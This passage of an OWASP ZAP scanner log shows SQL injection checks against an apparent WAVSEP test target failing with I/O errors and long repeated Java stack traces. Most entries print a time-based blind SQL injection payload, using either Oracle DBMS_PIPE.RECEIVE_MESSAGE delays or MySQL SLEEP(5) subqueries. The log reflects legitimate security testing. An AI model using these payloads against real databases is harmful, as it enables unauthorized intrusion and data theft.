org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681702 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(66)||CHR(66)||CHR(108),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(66)||CHR(66)||CHR(108),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681703 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(86)||CHR(118)||CHR(88),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(86)||CHR(118)||CHR(88),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681703 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(89)||CHR(116)||CHR(73),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(89)||CHR(116)||CHR(73),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681704 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(104)||CHR(119)||CHR(111),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(104)||CHR(119)||CHR(111),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681704 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(82)||CHR(80)||CHR(115),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(82)||CHR(80)||CHR(115),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681705 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) AND (SELECT * FROM (SELECT(SLEEP(5)))MaCq) AND (1236=1236] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) AND (SELECT * FROM (SELECT(SLEEP(5)))MaCq) AND (1236=1236 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681705 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))vUUI) AND (4822=4822] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))vUUI) AND (4822=4822 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681706 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND (SELECT * FROM (SELECT(SLEEP(5)))coYc)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND (SELECT * FROM (SELECT(SLEEP(5)))coYc) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681707 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') AND (SELECT * FROM (SELECT(SLEEP(5)))KivC) AND ('JQXe'='JQXe] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') AND (SELECT * FROM (SELECT(SLEEP(5)))KivC) AND ('JQXe'='JQXe at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681707 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))pNaL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))pNaL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681708 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))cpGo) AND ('xxAz'='xxAz] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))cpGo) AND ('xxAz'='xxAz at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681708 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' AND (SELECT * FROM (SELECT(SLEEP(5)))OYoq) AND 'yLkr'='yLkr] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' AND (SELECT * FROM (SELECT(SLEEP(5)))OYoq) AND 'yLkr'='yLkr at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681710 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' AND (SELECT * FROM (SELECT(SLEEP(5)))MOBP) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' AND (SELECT * FROM (SELECT(SLEEP(5)))MOBP) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681710 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))RasY) AND 'rpun'='rpun] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))RasY) AND 'rpun'='rpun at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681711 